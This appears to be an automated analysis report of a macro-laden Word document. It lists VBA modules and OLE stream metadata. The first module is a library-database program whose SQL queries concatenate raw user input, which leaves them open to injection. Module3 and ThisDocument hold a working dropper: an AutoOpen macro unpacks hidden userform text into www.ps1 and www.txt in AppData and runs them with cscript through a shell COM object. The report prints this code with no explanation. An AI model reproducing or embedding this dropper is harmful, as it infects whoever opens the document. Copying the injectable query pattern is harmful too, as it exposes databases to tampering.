                                                                                              End Sub
                                                                                              
                                                                                              Public Sub Search_Book1()
                                                                                              Set rs = New ADODB.Recordset
                                                                                              If frmTrans1.cboSBook.Text = "Call no" Then
                                                                                              rs.Open "Select * from Tbl_BOOK " & "where Call_no = '" & frmTrans1.txtSBook & "'", con, adOpenStatic, adLockOptimistic
                                                                                              
                                                                                              ElseIf frmTrans1.cboSBook.Text = "Book Name" Then
                                                                                              rs.Open "Select * from dbo.Tbl_BOOK " & "where Title = '" & frmTrans1.txtSBook.Text & "'", con, adOpenStatic, adLockOptimistic
                                                                                              
                                                                                              End If
                                                                                              Set frmTrans1.DataGrid4.DataSource = rs
                                                                                              End Sub
                                                                                              
                                                                                              
                                                                                              Public Sub Datagrid_Trans1()
                                                                                              Set rs = New ADODB.Recordset
                                                                                                  rs.Open "Select * from dbo.Tbl_STUDENTS where dbo.Tbl_STUDENTS.ID= " &     "'" & frmTrans1.DataGrid1.Columns.Item(0).Text & "'", con, adOpenStatic, adLockOptimistic
                                                                                                  frmTrans1.txtID.Text = rs!ID
                                                                                                  frmTrans1.lblname.Caption = rs!Firstname
                                                                                                  frmTrans1.lblmi.Caption = rs!MI
                                                                                                  frmTrans1.lbllast.Caption = rs!Lastname
                                                                                              End Sub
                                                                                              
                                                                                               Public Sub Display_borrower()
                                                                                                 Set rs = New ADODB.Recordset
                                                                                              rs.Open "select *from Tbl_Transaction where ID ='" & frmTrans1.txtID.Text & "'", con, adOpenStatic, adLockOptimistic
                                                                                              Set frmTrans1.Datagrid3.DataSource = rs
                                                                                              
                                                                                               End Sub
                                                                                              
                                                                                              'Public Sub View_Trans3()
                                                                                              'Set rs = New ADODB.Recordset
                                                                                              'rs.Open "select *  from dbo.Tbl_BOOK", con, adOpenStatic, adLockOptimistic
                                                                                              'Set frmTrans1.DataGrid5.DataSource = rs
                                                                                              'End Sub
                                                                                              
                                                                                              Public Sub View_Trans3result()
                                                                                              Set rs = New ADODB.Recordset
                                                                                              rs.Open "select *  from dbo.Tbl_BOOK", con, adOpenStatic, adLockOptimistic
                                                                                              Set frmTrans1.DataGrid4.DataSource = rs
                                                                                              End Sub
                                                                                              
                                                                                              
                                                                                              Public Sub OkBorrowed()
                                                                                              con.Execute "insert into dbo.Tbl_TRANSACTION values(" &                 "'" & frmTrans1.txtID.Text & "'," &                 "'" & frmTrans1.txtCall_no.Text & "'," &                 "'" & frmTrans1.txtTitle.Text & "'," &                 "'" & frmTrans1.txtAuthor.Text & "'," &                 "'" & frmTrans1.txtACC.Text & "'," &                 "'" & frmTrans1.txtBorrow.Text & "'," &                 "'" & frmTrans1.txtDue.Text & "'," &                 "'" & frmTrans1.txtReturned.Text & "'," &                 "'" & frmTrans1.txtRemarks.Text & "')"
                                                                                                  frmTrans1.palen.Caption = 1
                                                                                              End Sub
                                                                                              
                                                                                              
                                                                                              Public Sub Display_list()
                                                                                                Set rs = New ADODB.Recordset
                                                                                                  rs.Open "Select * from dbo.Tbl_TRANSACTION where dbo.Tbl_TRANSACTION.Call_no= " &     "'" & frmTrans1.Datagrid3.Columns.Item(0).Text & "'", con, adOpenStatic, adLockOptimistic
                                                                                               frmTrans1.txtCall_no.Text = rs!Call_no
                                                                                               frmTrans1.txtTitle.Text = rs!Title
                                                                                               frmTrans1.txtAuthor.Text = rs!Author
                                                                                               frmTrans1.txtACC.Text = rs!Acc_no
                                                                                              End Sub
                                                                                              
                                                                                               Public Sub Returned()
                                                                                               Set rs = New ADODB.Recordset
                                                                                                       rs.Open "select * from dbo.Tbl_TRANSACTION where dbo.Tbl_TRANSACTION.ID='" & frmTrans1.Datagrid3.Columns.Item(3).Text & "'", con, adOpenStatic, adLockOptimistic
                                                                                                       frmTrans1.txtCall_no.Text = rs!Call_no
                                                                                                       frmTrans1.txtTitle.Text = rs!Title
                                                                                                       frmTrans1.txtAuthor.Text = rs!Author
                                                                                                       frmTrans1.txtACC.Text = rs!Acc_no
                                                                                                       frmTrans1.txtBorrow.Text = rs!Date_Borrowed
                                                                                                       frmTrans1.txtDue.Text = rs!Date_Due
                                                                                                       frmTrans1.txtReturned.Text = rs!Date_Returned
                                                                                                       frmTrans1.txtRemarks.Text = "Returned"
                                                                                               End Sub
                                                                                              
                                                                                              Public Sub Returned1()
                                                                                              con.Execute "update dbo.Tbl_TRANSACTION set " &                 "Call_no = '" & frmTrans1.txtCall_no.Text & "', " &                 "Title = '" & frmTrans1.txtTitle.Text & "', " &                 "Author='" & frmTrans1.txtAuthor.Text & "', " &                 "Date_Borrowed='" & frmTrans1.txtBorrow.Text & "', " &                 "Date_Due='" & frmTrans1.txtDue.Text & "', " &                 "Date_Returned = '" & frmTrans1.txtReturned.Text & "', " &                 "Status = '" & frmTrans1.txtRemarks.Text & "'" &                 "where dbo.Tbl_TRANSACTION.ID='" & frmTrans1.txtID.Text & "'"
                                                                                              
                                                                                              End Sub
                                                                                              
                                                                                              Public Sub Delete()
                                                                                                  con.Execute "Delete from dbo.Tbl_TRANSACTION" &         " where ID = '" & frmBorrower.DataGrid1.Columns.Item(0).Text & "'"
                                                                                              End Sub
                                                                                              VBA File Name: Module3.vba, Stream Size: 3808
                                                                                              General
                                                                                              Stream Path:Macros/VBA/Module3
                                                                                              VBA File Name:Module3.vba
                                                                                              Stream Size:3808
                                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ^ ! . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                              Data Raw:01 16 01 00 02 f0 00 00 00 c4 04 00 00 d4 00 00 00 b0 01 00 00 ff ff ff ff 06 05 00 00 d6 0b 00 00 00 00 00 00 01 00 00 00 80 e0 5e 21 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 04 00 ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                              VBA Code
                                                                                              Attribute VB_Name = "Module3"
                                                                                              
                                                                                              Sub YRJTYSR()
                                                                                              
                                                                                              
                                                                                              Call eFile
                                                                                              
                                                                                              End Sub
                                                                                              
                                                                                              Sub eFile()
                                                                                              
                                                                                              Dim QQ1 As Object
                                                                                              Set QQ1 = New deutsche
                                                                                              
                                                                                              On Error Resume Next
                                                                                              
                                                                                              Dim WW, ff, Ne, ii, ss, hh As String
                                                                                              
                                                                                              Dim RO, ROI As String
                                                                                              RO = Environ("USERPROFILE") & "\AppData\Roaming\"
                                                                                              
                                                                                              ss = "error.txt"
                                                                                              ROI = RO + "www.ps1"
                                                                                              ROI2 = RO + "www.txt"
                                                                                              ii = ""
                                                                                              Ne = "ZZZZZZZZZZZZZZZZZZZZZZZZZZZZ"
                                                                                              
                                                                                              WW = QQ1.ttt1.Text
                                                                                              ff = Replace(WW, Ne, ii)
                                                                                              
                                                                                              WW2 = QQ1.ttt2.Text
                                                                                              ff2 = Replace(WW2, Ne, ii)
                                                                                              
                                                                                              MyFile = FreeFile
                                                                                              
                                                                                              Open ROI For Output As #MyFile
                                                                                                  Print #MyFile, ff
                                                                                              Close #MyFile
                                                                                              
                                                                                              NoHex 2
                                                                                              
                                                                                              Dim fso As New FileSystemObject
                                                                                              fso.MoveFile RO + ss, ROI
                                                                                              
                                                                                              NoHex 2
                                                                                              
                                                                                              
                                                                                              Open ROI2 For Output As #MyFile
                                                                                                  Print #MyFile, ff2
                                                                                              Close #MyFile
                                                                                              
                                                                                              NoHex 2
                                                                                              
                                                                                              
                                                                                              Dim h11 As Object
                                                                                              Set h11 = GetObject("new:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B")
                                                                                              
                                                                                              h11.Run "cscript.exe %appdata%\www.txt //E:VBScript //NoLogo " + "%~f0" + " %*", Chr(48)
                                                                                              
                                                                                              End
                                                                                              End Sub
                                                                                              
                                                                                              Public Sub NoHex(ByVal Seconds As Double)
                                                                                                Dim EndTime As Date
                                                                                                EndTime = DateAdd("s", Seconds, Now)
                                                                                                Do
                                                                                                  DoEvents
                                                                                                Loop Until Now >= EndTime
                                                                                              End Sub
                                                                                              VBA File Name: ThisDocument.cls, Stream Size: 3312
                                                                                              General
                                                                                              Stream Path:Macros/VBA/ThisDocument
                                                                                              VBA File Name:ThisDocument.cls
                                                                                              Stream Size:3312
                                                                                              Data ASCII:. . . . . . . . . v . . . . . . . . . . . . . . . ~ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                              Data Raw:01 16 01 00 01 f0 00 00 00 76 04 00 00 d4 00 00 00 da 01 00 00 ff ff ff ff 7e 04 00 00 a6 09 00 00 00 00 00 00 01 00 00 00 80 e0 f8 ef 00 00 ff ff a3 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                              VBA Code
                                                                                              Attribute VB_Name = "ThisDocument"
                                                                                              Attribute VB_Base = "1Normal.ThisDocument"
                                                                                              Attribute VB_GlobalNameSpace = False
                                                                                              Attribute VB_Creatable = False
                                                                                              Attribute VB_PredeclaredId = True
                                                                                              Attribute VB_Exposed = True
                                                                                              Attribute VB_TemplateDerived = True
                                                                                              Attribute VB_Customizable = True
                                                                                              Sub AutoOpen()
                                                                                              IfYes = "  workright  "
                                                                                              If lp = "  no  " Then
                                                                                              MsgBox ("  There  is  Error  ")
                                                                                              Else
                                                                                              On Error Resume Next
                                                                                               YRJTYSR
                                                                                               func1
                                                                                               func2
                                                                                               
                                                                                              End If
                                                                                              End Sub
                                                                                              Sub MergeFiles()
                                                                                                  Dim avFiles, lr As Long
                                                                                                  Dim docAct As Document, docNow As Document
                                                                                               
                                                                                                  With Application.FileDialog(msoFileDialogFilePicker)
                                                                                                      .InitialFileName = "*.doc*"
                                                                                                      .AllowMultiSelect = True
                                                                                                      If .Show = False Then Exit Sub
                                                                                                      Set docAct = ActiveDocument
                                                                                                      For lr = 1 To .SelectedItems.Count
                                                                                                          Set docNow = Documents.Open(.SelectedItems(lr))
                                                                                                          docNow.Range.Copy
                                                                                                          docAct.Range(docAct.Range.End - 1).Paste
                                                                                                          docAct.Range(docAct.Range.End - 1).InsertBreak Type:=0
                                                                                                          docNow.Close 0
                                                                                                      Next lr
                                                                                                  End With
                                                                                              End Sub
                                                                                              Function func1()
                                                                                               DoEvents
                                                                                                Selection.Delete Unit:=wdCharacter, Count:=1
                                                                                              End Function
                                                                                              
                                                                                              Function func2()
                                                                                               DoEvents
                                                                                                  Selection.WholeStory
                                                                                                  
                                                                                                  DoEvents
                                                                                                  With Selection.Font
                                                                                                      .NameFarEast = False
                                                                                                      .NameAscii = False
                                                                                                      .NameOther = False
                                                                                                      .Name = False
                                                                                                      .Hidden = False
                                                                                                  End With
                                                                                                   DoEvents
                                                                                              End Function
                                                                                              VBA File Name: UserForm1.frm, Stream Size: 1175
                                                                                              General
                                                                                              Stream Path:Macros/VBA/UserForm1
                                                                                              VBA File Name:UserForm1.frm
                                                                                              Stream Size:1175
                                                                                              Data ASCII:. . . . . . . . . P . . . . . . . L . . . . . . . W . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                              Data Raw:01 16 01 00 01 f0 00 00 00 50 03 00 00 d4 00 00 00 4c 02 00 00 ff ff ff ff 57 03 00 00 ab 03 00 00 00 00 00 00 01 00 00 00 80 e0 84 81 00 00 ff ff 01 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                              VBA Code
                                                                                              Attribute VB_Name = "UserForm1"
                                                                                              Attribute VB_Base = "0{95570FB4-F9A8-48A4-B0F7-392245E94ABE}{3A1B958B-2850-4504-93D8-E3B1B84B8470}"
                                                                                              Attribute VB_GlobalNameSpace = False
                                                                                              Attribute VB_Creatable = False
                                                                                              Attribute VB_PredeclaredId = True
                                                                                              Attribute VB_Exposed = False
                                                                                              Attribute VB_TemplateDerived = False
                                                                                              Attribute VB_Customizable = False
                                                                                              VBA File Name: deutsche.frm, Stream Size: 1359
                                                                                              General
                                                                                              Stream Path:Macros/VBA/deutsche
                                                                                              VBA File Name:deutsche.frm
                                                                                              Stream Size:1359
                                                                                              Data ASCII:. . . . . . . . . . . . . . . . . L . . . . . . . . . . . 7 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                              Data Raw:01 16 01 00 01 f0 00 00 00 90 03 00 00 d4 00 00 00 4c 02 00 00 ff ff ff ff 97 03 00 00 37 04 00 00 00 00 00 00 01 00 00 00 80 e0 83 d3 00 00 ff ff 01 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                              VBA Code
                                                                                              Attribute VB_Name = "deutsche"
                                                                                              Attribute VB_Base = "0{D803FC02-390F-4713-A33E-D0302CEAECAF}{603C2BE7-F2C8-4164-952A-B28BFA79AD68}"
                                                                                              Attribute VB_GlobalNameSpace = False
                                                                                              Attribute VB_Creatable = False
                                                                                              Attribute VB_PredeclaredId = True
                                                                                              Attribute VB_Exposed = False
                                                                                              Attribute VB_TemplateDerived = False
                                                                                              Attribute VB_Customizable = False
                                                                                              
                                                                                              
                                                                                              Private Sub UserForm_Click()
                                                                                              
                                                                                              End Sub

                                                                                              Streams

                                                                                              Stream Path: \x1CompObj, File Type: data, Stream Size: 114
                                                                                              General
                                                                                              Stream Path:\x1CompObj
                                                                                              File Type:data
                                                                                              Stream Size:114
                                                                                              Entropy:4.2359563651
                                                                                              Base64 Encoded:True
                                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . M i c r o s o f t W o r d 9 7 - 2 0 0 3 D o c u m e n t . . . . . M S W o r d D o c . . . . . W o r d . D o c u m e n t . 8 . . 9 . q . . . . . . . . . . . .
                                                                                              Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 06 09 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 20 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 57 6f 72 64 20 39 37 2d 32 30 30 33 20 44 6f 63 75 6d 65 6e 74 00 0a 00 00 00 4d 53 57 6f 72 64 44 6f 63 00 10 00 00 00 57 6f 72 64 2e 44 6f 63 75 6d 65 6e 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                              Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                                                                                              General
                                                                                              Stream Path:\x5DocumentSummaryInformation
                                                                                              File Type:data
                                                                                              Stream Size:4096
                                                                                              Entropy:0.353522856521
                                                                                              Base64 Encoded:False
                                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . h . . . . . . . p . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S P e c i a l i S T R e P a c k . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                              Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 20 01 00 00 0c 00 00 00 01 00 00 00 68 00 00 00 0f 00 00 00 70 00 00 00 05 00 00 00 8c 00 00 00 06 00 00 00 94 00 00 00 11 00 00 00 9c 00 00 00 17 00 00 00 a4 00 00 00 0b 00 00 00 ac 00 00 00 10 00 00 00 b4 00 00 00 13 00 00 00 bc 00 00 00
                                                                                              Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
                                                                                              General
                                                                                              Stream Path:\x5SummaryInformation
                                                                                              File Type:data
                                                                                              Stream Size:4096
                                                                                              Entropy:0.454190467647
                                                                                              Base64 Encoded:False
                                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . l . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . . . 4 . . . . . . . @ . . . . . . . L . . . . . . . T . . . . . . . \\ . . . . . . . d . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . .
                                                                                              Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 6c 01 00 00 11 00 00 00 01 00 00 00 90 00 00 00 02 00 00 00 98 00 00 00 03 00 00 00 a4 00 00 00 04 00 00 00 b0 00 00 00 05 00 00 00 bc 00 00 00 06 00 00 00 c8 00 00 00 07 00 00 00 d4 00 00 00 08 00 00 00 e4 00 00 00 09 00 00 00 fc 00 00 00
                                                                                              Stream Path: 1Table, File Type: data, Stream Size: 11683
                                                                                              General
                                                                                              Stream Path:1Table
                                                                                              File Type:data
                                                                                              Stream Size:11683
                                                                                              Entropy:5.34653855073
                                                                                              Base64 Encoded:True
                                                                                              Data ASCII:. . . . . . . . s . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . > . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . .
                                                                                              Data Raw:0a 06 0f 00 12 00 01 00 73 01 0f 00 07 00 03 00 03 00 03 00 00 00 04 00 08 00 00 00 98 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00
                                                                                              Stream Path: Data, File Type: data, Stream Size: 63641
                                                                                              General
                                                                                              Stream Path:Data
                                                                                              File Type:data
                                                                                              Stream Size:63641
                                                                                              Entropy:7.77155370959
                                                                                              Base64 Encoded:True
                                                                                              Data ASCII:. . . . D . d . . . . . . . . . . . . . . . . . . . . . \\ : . . r . r . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . V . . . . . . . . . . . . . . . . . . . C . . . 2 . . . . A . . . . . . . . . . . . . . . . . . . . . . T . a . x . . 8 . 2 . 8 . 5 . 2 . 6 . 1 . . . . . . . . . . . . . . . . R . . . . . . . . . . . . : k . . A . . . . . . U j . . . . . . . . . . D . . . . . . . . F . . . . . . . . . : k . . A . . . . . . U j . . . . . . L E x i f . . M M . * . . . . . . . . .
                                                                                              Data Raw:99 f8 00 00 44 00 64 00 00 00 00 00 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 5c 3a e1 0f 72 02 72 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 04 f0 56 00 00 00 b2 04 0a f0 08 00 00 00 01 04 00 00 00 0a 00 00 43 00 0b f0 32 00 00 00 04 41 01 00 00 00 05 c1 1a 00 00 00 06 01 02 00 00 00 ff 01 00 00 08 00 54 00 61 00
                                                                                              Stream Path: Macros/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 658
                                                                                              General
                                                                                              Stream Path:Macros/PROJECT
                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                              Stream Size:658
                                                                                              Entropy:5.27414286797
                                                                                              Base64 Encoded:True
                                                                                              Data ASCII:I D = " { 9 8 0 8 4 0 3 3 - A 3 0 D - 4 C D D - 9 7 6 B - E 1 0 8 4 E B A E F E A } " . . D o c u m e n t = T h i s D o c u m e n t / & H 0 0 0 0 0 0 0 0 . . P a c k a g e = { A C 9 F 2 F 9 0 - E 8 7 7 - 1 1 C E - 9 F 6 8 - 0 0 A A 0 0 5 7 4 A 4 F } . . B a s e C l a s s = d e u t s c h e . . . . . . . . B a s e C l a s s = U s e r F o r m 1 . . N a m e = " P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 8 C 8 E 8 5 5 7 8
                                                                                              Data Raw:49 44 3d 22 7b 39 38 30 38 34 30 33 33 2d 41 33 30 44 2d 34 43 44 44 2d 39 37 36 42 2d 45 31 30 38 34 45 42 41 45 46 45 41 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 44 6f 63 75 6d 65 6e 74 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 50 61 63 6b 61 67 65 3d 7b 41 43 39 46 32 46 39 30 2d 45 38 37 37 2d 31 31 43 45 2d 39 46 36 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 0d 0a 42
                                                                                              Stream Path: Macros/PROJECTwm, File Type: data, Stream Size: 170
                                                                                              General
                                                                                              Stream Path:Macros/PROJECTwm
                                                                                              File Type:data
                                                                                              Stream Size:170
                                                                                              Entropy:3.38985760081
                                                                                              Base64 Encoded:False
                                                                                              Data ASCII:T h i s D o c u m e n t . T . h . i . s . D . o . c . u . m . e . n . t . . . d e u t s c h e . d . e . u . t . s . c . h . e . . . M o d u l e 1 . M . o . d . u . l . e . 1 . . . M o d u l e 2 . M . o . d . u . l . e . 2 . . . M o d u l e 3 . M . o . d . u . l . e . 3 . . . U s e r F o r m 1 . U . s . e . r . F . o . r . m . 1 . . . . .
                                                                                              Data Raw:54 68 69 73 44 6f 63 75 6d 65 6e 74 00 54 00 68 00 69 00 73 00 44 00 6f 00 63 00 75 00 6d 00 65 00 6e 00 74 00 00 00 64 65 75 74 73 63 68 65 00 64 00 65 00 75 00 74 00 73 00 63 00 68 00 65 00 00 00 4d 6f 64 75 6c 65 31 00 4d 00 6f 00 64 00 75 00 6c 00 65 00 31 00 00 00 4d 6f 64 75 6c 65 32 00 4d 00 6f 00 64 00 75 00 6c 00 65 00 32 00 00 00 4d 6f 64 75 6c 65 33 00 4d 00 6f 00 64 00
                                                                                              Stream Path: Macros/UserForm1/\x1CompObj, File Type: data, Stream Size: 97
                                                                                              General
                                                                                              Stream Path:Macros/UserForm1/\x1CompObj
                                                                                              File Type:data
                                                                                              Stream Size:97
                                                                                              Entropy:3.61064918306
                                                                                              Base64 Encoded:False
                                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . . 9 . q . . . . . . . . . . . .
                                                                                              Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                              Stream Path: Macros/UserForm1/\x3VBFrame, File Type: ASCII text, with CRLF line terminators, Stream Size: 266
                                                                                              General
                                                                                              Stream Path:Macros/UserForm1/\x3VBFrame
                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                              Stream Size:266
                                                                                              Entropy:4.61410677042
                                                                                              Base64 Encoded:True
                                                                                              Data ASCII:V E R S I O N 5 . 0 0 . . B e g i n { C 6 2 A 6 9 F 0 - 1 6 D C - 1 1 C E - 9 E 9 8 - 0 0 A A 0 0 5 7 4 A 4 F } U s e r F o r m 1 . . C a p t i o n = " U s e r F o r m 1 " . . C l i e n t H e i g h t = 5 0 5 5 . . C l i e n t L e f t = 1 2 0 . . C l i e n t T o p = 4 6 5 . . C l i e n t W i d t h = 6 7 6 5 . . S t a r t U p P o s i t i o n = 1 ' C e n t e r O w
                                                                                              Data Raw:56 45 52 53 49 4f 4e 20 35 2e 30 30 0d 0a 42 65 67 69 6e 20 7b 43 36 32 41 36 39 46 30 2d 31 36 44 43 2d 31 31 43 45 2d 39 45 39 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 20 55 73 65 72 46 6f 72 6d 31 20 0d 0a 20 20 20 43 61 70 74 69 6f 6e 20 20 20 20 20 20 20 20 20 3d 20 20 20 22 55 73 65 72 46 6f 72 6d 31 22 0d 0a 20 20 20 43 6c 69 65 6e 74 48 65 69 67 68 74 20 20 20 20 3d 20
                                                                                              Stream Path: Macros/UserForm1/f, File Type: data, Stream Size: 24953
                                                                                              General
                                                                                              Stream Path:Macros/UserForm1/f
                                                                                              File Type:data
                                                                                              Stream Size:24953
                                                                                              Entropy:7.56457225744
                                                                                              Base64 Encoded:True
                                                                                              Data ASCII:. . . @ . . . @ . . . . . . . } . . . . . . . " . . . . . . . . . . . R . . . . . . . . . . . K . Q l t . . # a . . . . . . . . J F I F . . . . . ` . ` . . . . . F E x i f . . M M . * . . . . . . . . . . . . . . . . . . Q . . . . . . . . . . . Q . . . . . . . . . . . Q . . . . . . . . . . . . . . . . . . C . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . C . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                              Data Raw:00 04 20 00 40 0c 20 08 04 40 00 00 ff ff 00 00 00 7d 00 00 9d 2e 00 00 d4 22 00 00 00 00 00 00 00 00 00 00 04 52 e3 0b 91 8f ce 11 9d e3 00 aa 00 4b b8 51 6c 74 00 00 23 61 00 00 ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff e1 00 46 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 04 01 12 00 03 00 00 00 01 00 01 00 00 51 10 00 01 00 00 00 01 01 00 00 00 51 11 00 04
                                                                                              Stream Path: Macros/UserForm1/o, File Type: empty, Stream Size: 0
                                                                                              General
                                                                                              Stream Path:Macros/UserForm1/o
                                                                                              File Type:empty
                                                                                              Stream Size:0
                                                                                              Entropy:0.0
                                                                                              Base64 Encoded:False
                                                                                              Data ASCII:
                                                                                              Data Raw:
                                                                                              Stream Path: Macros/VBA/_VBA_PROJECT, File Type: data, Stream Size: 6488
                                                                                              General
                                                                                              Stream Path:Macros/VBA/_VBA_PROJECT
                                                                                              File Type:data
                                                                                              Stream Size:6488
                                                                                              Entropy:4.97878517463
                                                                                              Base64 Encoded:False
